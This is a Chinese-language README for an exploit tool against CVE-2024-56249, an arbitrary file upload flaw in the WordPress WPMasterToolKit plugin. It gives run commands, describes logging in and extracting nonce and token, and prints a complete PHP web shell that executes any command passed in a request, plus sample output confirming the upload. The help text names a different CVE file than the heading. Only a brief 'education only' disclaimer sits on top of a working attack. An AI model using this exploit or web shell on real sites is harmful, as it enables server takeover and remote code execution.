该脚本利用 WordPress WPMasterToolKit 插件中的任意文件上传漏洞,允许攻击者将网页后门上传到服务器。该漏洞存在于插件版本 <= 1.13.1 中。
要利用此漏洞,请使用以下命令:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: 目标 WordPress URL(例如 http://192.168.100.74:888/wordpress)-un / --username: WordPress 管理员用户名-p / --password: WordPress 管理员密码-fp / --filepath: 文件上传路径(默认: wp-content/uploads/2025/03)-fn / --filename: 要上传的文件名(默认: shell.php)脚本首先探测目标 URL,通过检查 WPMasterToolKit 插件的版本来验证其是否存在 CVE-2024-56249 漏洞。
然后尝试使用提供的凭据登录到 WordPress 管理面板。
成功登录后,脚本提取文件上传所需的安全令牌(nonce 和 token)。
利用提取的令牌,将指定的文件(例如 Web Shell)上传到目标服务器。
最后,脚本通过检查文件是否可通过目标 URL 访问来验证上传是否成功。
请确保 shell 文件(例如 shell.php)与脚本位于同一目录中,然后再运行脚本。这是脚本成功定位并上传文件的必要条件。
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
此工具仅用于教育目的。使用风险自负。作者对因使用此工具造成的任何误用或损害概不负责。
漏洞利用脚本由 Nxploit | Khaled Alenazi 编写